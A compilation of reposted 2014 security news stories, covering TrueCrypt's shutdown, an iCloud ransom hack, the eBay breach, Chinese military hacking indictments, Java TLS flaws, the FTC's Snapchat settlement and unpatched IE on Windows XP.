Using TrueCrypt is not secure” , End of TrueCrypt Development

Source: www.ehackingnews.com

“Using TrueCrypt is not secure” , End of TrueCrypt Development – See more at: http://www.ehackingnews.com/2014/05/using-truecrypt-is-not-secure-end-of.html#sthash.WFGXmKcM.dpuf

 

Today, security enthusiasts woke up with a shocking news that TrueCrypt has ended its development and warns users that the tool used for encrypting drive is not safe to use.

Sponsored Links
Users who try to access the official TrueCrypt website are being redirected to the official sourceforge page of Truecrypt(truecrypt.sourceforge.net/).  The page displays the following message:

“WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues”

The message continued “The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP. Windows 8/7/Vista and later offer integrated support for encrypted disks and virtual disk images. Such integrated support is also available on other platforms .

The page suggests users to migrate any data encrypted by TrueCrypt to encrypted disks supported on their platform.  It also has provided steps for migrating to an encrypted BitLocker drive.

Many, including me, are not able to believe our own eyes.  It is uncertain whether it is official announcement from the development team or some one has hacked the Truecrypt website.

Matthew Green, who teaches cryptography at Johns Hopkins, researcher involved with the TrueCrypt audit, tweeted that he thinks the news is legitimate.

A new binary (Truecrypt v7.2) has been uploaded to sourceforge page in the last 24 hours.  Upon opening this binary, the following error message is being displayed:
The binary is not allowing users to “create new volume”.  It only allows you to mount the volumes.  Users are advised not to download this latest version, as it may contain malicious code.

Apple devices ‘hijacked for ransom’

Source: BBC UK

Several users of Apple devices in Australia have reported that their gadgets have been “hijacked” – with a message demanding money.

Experts believed the hack had targeted users by exploiting the Find my iPhone feature.

A message appeared on some targeted phones asking for “$100 USD/EUR” to be sent to a PayPal account.

Networks advised affected users to contact Apple, which denied its cloud storage service had been breached.

“Apple takes security very seriously and iCloud was not compromised during this incident. Impacted users should change their Apple ID password as soon as possible and avoid using the same user name and password for multiple services,” the firm said in a statement to The Register news site.

“Any users who need additional help can contact AppleCare or visit their local Apple Retail Store.”

PayPal has said any funds sent to the specified account would be refunded.

‘Woke me up’

According to the Sydney Morning Herald, the problem spread across much of Australia, with reports of attacks in Queensland, New South Wales, Western Australia, South Australia and Victoria.

 Apple’s iCloud co-ordinates data across devices but cut one journalist off from his digital life

However, reports have emerged from further afield, with at least one case said to have occurred in London. It involved an Australian visiting on holiday.

Concerned users took to Apple’s support forums, and Twitter, to share details of attacks, which affected iPhones, iPads and, in some cases, Mac laptops.

“This has happened to me too in Brisbane, woke me up half an hour ago,” wrote one user, amberoonie.

“Freaking out as when I opened my laptop it had the same message ‘Device hacked by Oleg Pliss. For unlock device’ with the Find My iPhone icon.”

It is unlikely the hacker would use his real name in the message.

‘Not an option’

Information security consultant Brian Honan told the BBC that so far little is known about the source of the attacks.

He said theories ranged from someone having access to Apple’s systems, to hackers having access to a database of usernames and passwords – perhaps obtained from a third party.

Regardless, he said Apple had to move quickly to reassure users.

“One of the key things, as in any security breach, is being able to communicate proactively with your affected customers,” he said.

“Even just to let them know what you’re doing to deal with the issue can be reassuring.”

New point of sale malware compromises 1500 devices.

Source: www.thehackernews.com

Point of Sale malware
In past few months, the malware developers are more focusing on proliferating and upgrading malicious malwares to target Point-of-Sale (POS) machines. Due to the lack of concern and security measures, point-of-sale (POS) systems have become an attractive target for cybercriminals and malware writers.
BlackPOS malware caused massive data breaches in various US retailers targeting POS machines and the largest one is TARGET data breach occurred during the last Christmas holidays. The third-largest U.S. Retailer in which over 40 million Credit & Debit cards were stolen, used to pay for purchases at its 1500 stores nationwide in the U.S.
Neiman Marcus, Michaels Store were also targeted involving the heist of possibly 110 million Credit-Debit cards, and personal information. BlackPOS malware was embedded in point-of-sale (POS) equipment at the checkout counters to collect secure data as the credit cards were swiped during transactions.

 

eBay Hacked, Urges All Members to Change Passwords Immediately

Source: www.yahoo.com

 

The online auction and sales giant eBay posted a message Wednesday morning saying that it had been hacked, urging all of its members to change their passwords.

The company said in a statement that a database containing encrypted passwords had been breached, but that financial data, including credit card information, was stored separately and was still safe. Hackers were able to gain access to eBay employee log-ins, eBay said, which in turn gave them access to the encoded passwords.

eBay says that no unauthorized transactions have yet been made with the information. But if you’re an eBay user, you still definitely need a new password.

“[C]hanging passwords is a best practice,” the statement said, “and will help enhance security for eBay users.”

In the statement, which was unsigned, eBay said that the attack took place between late February and early March. Though the passwords that the hackers gained access to were encrypted, or obscured by a code to prevent easy reading, eBay did say that the hackers were able to access members’ names, email addresses, physical addresses, phone numbers, and dates of birth. 

The real takeaway from this: Change your eBay password (go to My eBay and open the Personal Information link you’ll see on the left). If you use the same password on multiple sites, you’ll need to change those passwords, too, should the hackers successfully break the encryption.

eBay Hacked, Urges All Members to Change Passwords Immediately

And if you’re looking for a strong new password, now is a good time to revisit our guide to creating secure passwords on all your online accounts.

Symantec revamps small business security suite

Source: www.infoworld.com

 

Symantec’s latest product, Norton Small Business, is perhaps the most well-rounded and ambitious offering the company has inserted into its product array for small companies.

The security company has been working for more than a year to revamp its product line as the company faces an ever-competitive security market.

Symantec has at least four products it says are suited for small businesses such as Norton 360 version 6.0, Norton AntiVirus 2012, Norton Internet Security 2012 and Symantec Protection Suite Small Business Edition. All are priced differently and have some overlapping features.

None of those products are being retired but will instead be joined by Norton Small Business, which has been geared to keep up with trends: mobile device security and protection for Apple desktop computers. It is aimed at companies with fewer than 20 employees that are unlikely to have a full-time IT specialist.

Symantec is also offering an ambitious guarantee to Norton Small Business buyers called “Virus Removal Assurance.” It is offering free phone support as part of the guarantee, saying that if its support technicians can’t remove the malicious software, customers can get their money back for the product.

Virus and spyware removal support is a feature of other Symantec products, such as the NortonLive Service, but costs $100 per call. The company claims it is able to remove malware in 99.9 percent of the time.

Symantec’s guarantee assumes a customer actually knows they’re infected and that malware has been found on the computer, an increasingly difficult task for consumer-grade security software suites.

For general antivirus protection, Norton Small Business uses Symantec’s Insight and Sonar technologies, which are designed to spot unknown malicious files and programs and and classify them based on their reputation and behavior, a more effective method than relying on signatures.

Since mobile devices are increasingly being used by small businesses, the product has several security and device management features, mostly for Android.

The suite will scan Android applications to see if they’re malicious. It also can block calls and text messages from certain numbers and will also scan SD memory cards.

For iOS iPads and iPhones, the features of Norton Small Business are limited due to Apple’s tight control over its devices and what kind of applications users can install. Apple doesn’t allow security applications to be installed on its mobile devices, so the security features offered for Android devices don’t apply to Apple ones.

A product sheet claims that Norton Small Business can track a lost Apple device, but Apple has already incorporated that feature into iOS. It also has a “scream alarm” to locate a missing iOS device that may be within earshot.

The suite supports Apple desktop computers running Mac OS X version 10.7 and later.

Symantec has aimed manage of the software easy for small business owners across devices, said Anne O’Neill, Symantec’s senior marketing director for North America.

An online management console shows what devices have Norton Small Business installed. Whoever is managing a company’s IT security can email “invites” to new employees, which contains a link to download the suite. The product can also be deactivated on a device from the console.

The subscription service starts at $99 for an annual subscription covering five devices, and goes on to $199 for 10 devices and $399 for 20. New devices can be added for $20 annually, with the subscription pro-rated according to the remaining subscription period.

U.S. Charges Five Chinese Military Officers With Spying

Source: Bloomberg

The U.S. dramatically escalated its battle to curb China’s technology theft from American companies by accusing five Chinese military officials of stealing trade secrets, casting the hacker attacks as a direct economic threat.

The indictment effectively accuses China and its government of a vast effort to mine U.S. technology through cyber-espionage, stealing jobs as well as the innovation on which the success of major global companies like United States Steel Corp. (X) and Alcoa Corp. (AA) depends.

While hundreds of U.S. entities have been penetrated by Chinese military hackers since 2002, the Justice Department focused on five companies specializing in solar panels, metals and next-generation nuclear power plants. Four companies are headquartered or have main offices in Western Pennsylvania and officials calculated the toll in human terms.

“The lifeblood of any organization is the people who work, strive and sweat for it,” David Hickton, U.S. Attorney for the Western District of Pennsylvania, said at a news conference in Washington. “When these cyber-intrusions occur, production slows, plants close, workers get laid off and lose their homes.”

The charges, unsealed today in District Court in Pennsylvania, allege the Chinese officers conspired to steal trade secrets and other information from U.S. companies, including Westinghouse Electric Co. and Allegheny Technologies Inc. (ATI) and the United Steel, Paper and Forestry, Rubber, Manufacturing, Energy, Allied Industrial Services Workers International Union.

Photographer: Feng Li – Pool/Getty Images

A Chinese flag is adjusted before at the Great Hall of the People in Beijing.

Pressure Point

The indictments may add a new pressure point in U.S.-China relations, which are strained by Chinese territorial disputes with U.S. allies such as Japan and the Philippines as well as economic competition around the world. While President Barack Obama has said that he welcomes China’s rise as an economic and military power, his administration has sought to increase U.S. presence and influence in the region.

“It’s going to be explosive,” said Paul M. Tiao, a former senior counselor on cybersecurity to FBI director Robert Mueller. “This will have significant diplomatic implications and will affect our relationship with the Chinese government.”

The Chinese government denied engaging in economic espionage and said it would suspend participation in a U.S.- China cyber working group, which was formed last year to discuss rules for cyberspace and as a mechanism to manage differences between the two countries.

Photographer: Andrew Harrer/Bloomberg

Attorney General Eric Holder will hold a press conference at 10 a.m. today with U.S…. Read More

“The U.S. accusation against Chinese personnel is purely ungrounded and absurd,” Geng Shuang, spokesman for the Chinese embassy in Washington, said in an e-mail.

‘Aggressive Response’

U.S. Attorney General Eric Holder called the stolen data significant and said the theft “demands an aggressive response.” Hickton said the cost to companies hacked potentially amounts to billions of dollars in lost research and development.

“This cyberhacking leads directly to the loss of jobs here in the United States,” Hickton said. “This 21st Century burglary has to stop.”

Those indicted were officers in Unit 61398 of the Third Department of the Chinese People’s Liberation Army. The Justice Department identified them as Wang Dong, Sun Kailiang, Wen Xinyu, Huang Zhenyu and Gu Chunhui.

In one of the cases, the Justice Department said Sun stole proprietary technical and design specifications for piping from Westinghouse, the nuclear reactor arm of Toshiba Corp. (6502), as the company was building four power plants in China and negotiating other business ventures with state-owned enterprises.

In another instance, Wang and Sun hacked into U.S. Steel computers as the company was participating in trade cases, according to the department’s statement.

Companies Hacked

The indictment appears to be the first public disclosure of some of the intrusions, raising the question why the companies had not disclosed the events to investors.

“To our knowledge, no material information was compromised during this incident, which occurred several years ago,” Monica Orbe, an Alcoa spokeswoman, said in an e-mail today. “Safeguarding our data is a top priority for Alcoa and we continue to invest resources to protect our systems.”

While being spied upon would be a “big honor” and a sign that Solarworld has developed first-rate photovoltaic technology, “it’s a criminal act to steal what we are developing with a lot of money,” Solarworld Chief Executive Frank Asbeck said in a phone interview today.

Sheila Holt, a spokeswoman for the Pittsburgh-based Westinghouse unit of Toshiba, said the company just learned of the indictment. She declined to say whether the company is cooperating with investigators.

Army Links

China-based hackers with links to the People’s Liberation Army have been conducting commercial espionage on Western companies despite the Chinese government’s denial of the accusation last year, Mandiant Corp. (FEYE), the information security firm, said in a report posted April 10 on its website. Mandiant has since been acquired by FireEye Inc.

The hackers, operating since 2006, also stole sensitive communications that would help Chinese competitors in litigation by providing “insight into the strategy and vulnerabilities of the American entity,” the Justice Department said in a statement.

Holder and Robert Anderson, an executive director at the Federal Bureau of Information, said every effort will be made to bring the indicted officials to court in Western Pennsylvania.

“This is the new normal,” Anderson said. “This is what you’re going to see on a recurring basis, not just every six months, not just every year.”

Confronting China

The Obama administration decided last year to publicly confront China with claims that it is behind a campaign to hack into U.S. agencies and corporations to steal trade secrets and potentially disrupt computer networks operating banks, power grids and telecommunications networks.

“Success in the global marketplace should be based solely on a company’s ability to innovate and compete, not on a sponsor government’s ability to spy and steal business secrets,” Holder said, emphasizing that U.S. surveillance and spying is not used for commercial purposes.

The Pentagon for the first time in May 2013 accused the Chinese military of intruding into U.S. computers to steal sensitive data.

Wealth Transfer

Former Army General Keith Alexander, who headed the National Security Agency and U.S. Cyber Command, has called the hacking of U.S. trade secrets the greatest transfer of wealth in history.

Despite the push by the Obama administration, no charges had been brought against Chinese officials for hacking. The effort also was overshadowed by documents leaked by former government contractor Edward Snowden last year revealing the extent of NSA spying both domestically and abroad. China maintains that it’s a victim of hacking and opposes such activities.

Hacking activities originating in China temporarily dropped after Mandiant’s first report in February 2013, and by the end of summer the groups returned to “consistent intrusion activity” Mandiant’s latest report said. It said the lull could have been an attempt by the Chinese to assess any political damage following the publication of its report and to reorganize its cyber operations to better hide its activities.

Microsoft acknowledges more errors, 80070371 and 80071A91, when installing Windows 8.1 Update/KB 2919355

There’s confirmation of two more bugs and a Stop 0x7B ‘Blue Screen’ as Microsoft re-issues the patch, changing metadata but no programs

Source: www.infoworld.com

Microsoft acknowledges more errors, 80070371 and 80071A91, when installing Windows 8.1 Update/KB 2919355

The Windows 8.1 Update blowout continues. We now have official recognition of two more error codes, 80070371 and 80071A91, which can occur when you try to install Windows 8.1 Update, KB 2919355.

These revalations come on the heels of acknowledged errors 800F0922, 800F0923, 80070003, 80070005, 80070490, and 80073712, and the error message “We couldn’t complete the updates, Undoing changes. Don’t turn off your computer.” Microsoft gave workarounds for some (but not all) of the those earlier problems on the Microsoft Answers forum earlier this week.

In addition, after installing KB 2919355, Internet Explorer 11 may crash when you turn on or turn off Enterprise Mode, as described in KB 2956283. You may also hit a Stop 0x7B “Blue Screen” error, described in KB 2967012.

Microsoft has re-issued patch KB 2919355 yet again, changing the installation metadata but not the programs themselves. The associated Knowledge Base article is now up to version 21.

Yes, this is the same patch that Microsoft was going to use as a “baseline” for all future Windows 8.1 patches: Up until Monday of this week, Microsoft’s official, oft-repeated policy demanded that customers install KB 2919355 if they wanted any future Windows 8.1 security patches. Fortunately, on May 12 cooler heads prevailed and Microsoft informed Windows 8.1 customers that the threatened Windows 8.1 patch cutoff was a paper tiger — those who didn’t get Windows 8.1 Update/KB2919322 installed by May 13 would continue to receive updates for another month, until Black Tuesday June 9.

The June 9 cutoff date is now two and a half weeks away. If you can’t get KB 2919355 installed by June 9, Microsoft is threatening (once again) that you won’t be able to get any more patches.

I count 11 known, documented error messages, codes, and crashes for KB 2919355 — and nearly zero definitive solutions. Sure hope Microsoft can solve all those problems by June 9.

It bears repeating, folks: You can’t patch a desktop like a phone.

This story, “Microsoft acknowledges more errors, 80070371 and 80071A91, when installing Windows 8.1 Update/KB 2919355,” was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter.

Critical vulnerabilities in TLS implementation for Java

Source: www.sciencedaily.com


In January and April 2014, Oracle has released critical Java software security updates. They resolve, amongst others, three vulnerabilities discovered by researchers from the Horst Görtz Institute for IT Security at the Ruhr-Universität Bochum. These vulnerabilities affect the “Java Secure Socket Extension” (JSSE), a software library implementing the “Transport Layer Security” protocol (TLS). TLS is used to encrypt sensitive information transferred between browsers and web servers, such as passwords and credit card data, for example.

Similar to Heartbleed

Recently, the Heartbleed vulnerability of OpenSSL, the most important TLS implementation, has hit the headlines. Like OpenSSL, JSSE is an open source TLS implementation, maintained by Oracle. The researchers discovered three weaknesses in the JSSE library, two of which could be used to completely break the security of TLS encryption. Following the “responsible disclosure” paradigm, the team of Prof Dr Jörg Schwenk privately informed Oracle about these vulnerabilities prior to public announcement. The researchers recommend to install Oracle’s software updates for applications using JSSE as soon as possible.

How to break TLS in JSSE

JSSE was found vulnerable to so-called “Bleichenbacher attacks.” First, the researchers intercepted an encrypted communication between a client (e.g. a web browser) and a server. Then, they sent a few thousands requests to the server; by examining the responses of the server they could compute the secret session key. This session key can be used to decrypt all data exchanged between client and server. The first vulnerability was based on critical information that the TLS server transmitted via error messages. The second one was based on different response times of the JSSE server. Bleichenbacher attacks are complex cryptographic attacks, also referred to as adaptive chosen-ciphertext attacks.

April patch from Oracle solves another problem

The April patch provided by Oracle also fixes another cryptographic algorithm (PKCS#1 v2.1, aka RSA-OAEP), which was vulnerable to a different adaptive chosen-ciphertext attack. This algorithm is not used in TLS, but in other security-critical applications, such as Web Services, for instance.

Snapchat Lied about privacy, saved your selfie images and videos on their server

Source: www.hackread.com

 

Snapchat has agreed to settle with the Federal Trade Commission (FTC) deception charges leveled against itself without admitting or denying any wrongdoing, says an official statement released on Thursday.

As part of the settlement, the company is required to implement a privacy program monitored by an outside privacy expert for the next 20 years.

This settlement is similar to arrangements endorsed by Google, Facebook, and Myspace.

FTC had complained against Snapchat for ‘making multiple misrepresentations to consumers about its product that stood in stark contrast to how the app actually worked.

snapchat-lied-about-privacy-it-saves-your-photos-and-videos-on-their-server

Other charges slapped against Snapchat included:

  • It stored video snaps unencrypted on the recipient’s device in a location outside the apps’ ‘sandbox’
  • Misrepresentation of data collection practices
  • Collection of iOS users’ contacts information from their address books without their consent: The apps, during registration, prompted the users to enter their mobile number to find their friends on Snapchat. It informed the users that the apps will collect their email, phone numbers, and Facebook ID. However, it also collected the names and phone numbers of all the contacts in their mobile device’s address book without the users’ permission.
  • Failure to secure its ‘Find Friends’ feature that resulted in a security breach that allowed the attackers to collect usernames and phone numbers of 4.6 million Snapchat users. The apps was updated later and provided the users with an option to opt out of the Find Friends feature.

Snapchat is a widely used messaging apps, which promises privacy and security, because the messages exchanged through its servers do not stay there forever but disappear after the recipient has viewed the message.

However, FTC claimed that messages did not disappear; conversations, images and videos could be easily saved by third party applications and that the application’s premises were misleading.

FTC recorded several cases of misrepresentations from the messaging company. Recipients could easily access the videos once they connected their mobile device to a computer and navigated the file directory of the device. As well, FTC found a false claim about the user receiving a notification whenever the recipient tries to take a screenshot of the video or the message. A recipient using Apple device with an operating system prior to iOS 7 can escape the screenshot detection.

Additionally, the Snapchat’s Android application transmitted geolocation information of its users, observed the FTC.

Edith Ramirez, FTC Chairwoman, said,

“If a company markets privacy and security as key selling points in pitching its service to consumers, it is critical that it keep those promises”

She added further,

“Any company that makes misrepresentations to consumers about its privacy and security practices risks FTC action.”

The Snapchat settlement is part of the FTC’s ongoing effort to ensure privacy promises maintained truthfully by the application manufacturers.

Although, the settlement does not have any financial component to it, but any further violation is punishable by a civil penalty of up to USD 16,000 each.

The FTC plans to publish a description of the consent agreement package soon, which will be available for public comments till 9 June, 2014.

Snapchat, on its blog on Thursday, said

“This morning we entered into a consent decree with the FTC that addresses concerns raised by the commission. We continue to invest heavily in security and countermeasures to prevent abuse,” the blog post read.

They also said their main focus was to develop ‘a unique, fast way to communicate with photos’ and in doing so,

“some things didn’t get the attention they could have. One of those was being more precise with how we communicated with the Snapchat community.”

However, the company blog reiterated,

“We are devoted to promoting user privacy and giving Snapchatters control over how and with whom they communicate. That’s something we’ve always taken seriously, and always will.”

Snapchat is a Los Angeles-based company, run by Evan Spiegel and Bobby Murphy, two former Stanford alumni.

Released in 2011, the service quickly gained a following and now claims to transmit 700 million messages every day.

But is privacy and security in an online environment a plausible desire?

Security researchers firmly believe that anything sent over the Internet stands chance of interception and that anything posted on the Internet remains forever.

“The Internet is forever, and people don’t realize that. You think you can delete a tweet or a Facebook post, but it doesn’t go away. Most people don’t know how hard it is to make a message disappear,” told Nico Sell, a security expert and one of the founders of rival mobile message app Wickr, to The New York Times.

Microsoft sticks to vow, leaves XP exposed to ongoing attacks

Source: www.computerworld.com

Hackers are exploiting an Internet Explorer (IE) vulnerability that was left unpatched in Windows XP on Tuesday, Microsoft and outside security experts said.

The bug, identified as CVE-2014-1815, was one of two Microsoft patched with a critical update issued Tuesday for IE6, IE7, IE8, IE9, IE10 and IE11. In the accompanying security bulletin, Microsoft noted that the vulnerability had been both known to hackers and used by them prior to yesterday’s update.

“Microsoft is aware of limited attacks that attempt to exploit this vulnerability in Internet Explorer,” the bulletin stated.

But because Windows XP exhausted its support privileges last month, users running the aged operating system did not receive the IE security update, as did owners of Windows Vista, Windows 7 and Windows 8 PCs.

Windows XP lives

  • Microsoft sticks to vow, leaves XP exposed to ongoing attacks
  • Microsoft’s Patch Tuesday gives XP attackers a roadmap
  • Microsoft: We’re serious this time; XP’s dead to us
  • Windows XP die-hards can slash attack risk by dumping IE
  • Hackers now crave patches, and Microsoft’s giving them just what they want
  • Microsoft seeds doubt by erasing XP line in the sand
  • XP’s retirement triggers another wave of deserters
  • Microsoft slashes Windows XP custom support prices just days before axing public patches
  • Update: IRS misses XP deadline, will spend $30M to upgrade remaining PCs
  • Microsoft Patch Tuesday bids adieu to Windows XP
More on Windows

Also on Tuesday, Microsoft reasserted that it has patched its last Windows XP bug. In the strongest signal yet that it will stick with its plan — and that a May 1 emergency patch for IE on XP had been a one-time deal — a company spokesman said, “The Windows XP end of support policy still remains in place moving forward.”

Originally, Windows XP was bundled with IE6, but over the years users have upgraded to IE7 and then IE8, the five-year-old browser that is the newest from Microsoft able to run on XP. If XP was still supported, XP PCs would certainly have received the update.

“This is the first advisory that clearly would have applied to Windows XP,” said Ross Barrett, senior manager of security engineering at Rapid7, in an email yesterday. “IE6, IE7 and IE8 are vulnerable on Windows [Server] 2003; this would historically have mapped to the same scope of XP patches, but not this time.”

As Barrett noted, Microsoft’s security bulletin listed Windows Server 2003 as affected by the vulnerability. The server software was patched Tuesday because its support lifespan runs until July 14, 2015.

CVE-2014-1815 is a classic “drive-by” vulnerability that can be triggered simply by duping IE users into visiting a malicious or compromised website. As soon as an unpatched Internet Explorer reaches such a site, the exploit leaps into action, immediately hijacking the PC and sticking malware on the hard drive.

Because IE6, IE7 and IE8 on Windows XP will not be patched, users will remain vulnerable to these sneaky attacks in perpetuity.

Most security professionals have urged people stuck on XP to switch to another browser, one that still receives updates: Google’s Chrome, Mozilla’s Firefox and Opera Software’s Opera all fit that bill. According to research conducted by Computerworld, XP users can dramatically lower their risk by dumping IE.

Other vulnerabilities patched by Microsoft yesterday were also left unfixed in Windows XP. “We can assume that any vulnerability that [was] for Windows Server 2003 is applicable to XP as well. For this month, that means at least: MS12-029 (IE), MS12-024 (ASLR), and MS12-025 (Group Profile),” said Wolfgang Kandek, chief technology officer at Qualys, in an email.

Together, those three security updates patched four vulnerabilities out of the month’s total of 13.

For people who cannot give up IE, Microsoft provided workarounds it said would help ward off attacks, including those aimed at the browser when it’s running on Windows XP. However, the workarounds have negative side effects that may make some websites unusable, Microsoft warned. The security bulletin MS14-029 includes those workaround instructions.

Another stop-gap users can deploy is the Enhanced Mitigation Experience Toolkit (EMET), a free anti-exploit utility that works on Windows XP. EMET 4.1 can be downloaded from Microsoft’s website.

CVE-2014-1815 was reported to Microsoft by Clement Lecigne, a security engineer who works for Google in its Swiss office.

Lecigne made news three months ago when he was awarded $10,000 by the Internet Bug Bounty (IBB), a new program funded by Facebook and Microsoft. IBB cut Lecigne the check for finding a critical vulnerability in Adobe’s Flash Player. Lecigne donated the $10,000 to the Hackers for Charity non-profit.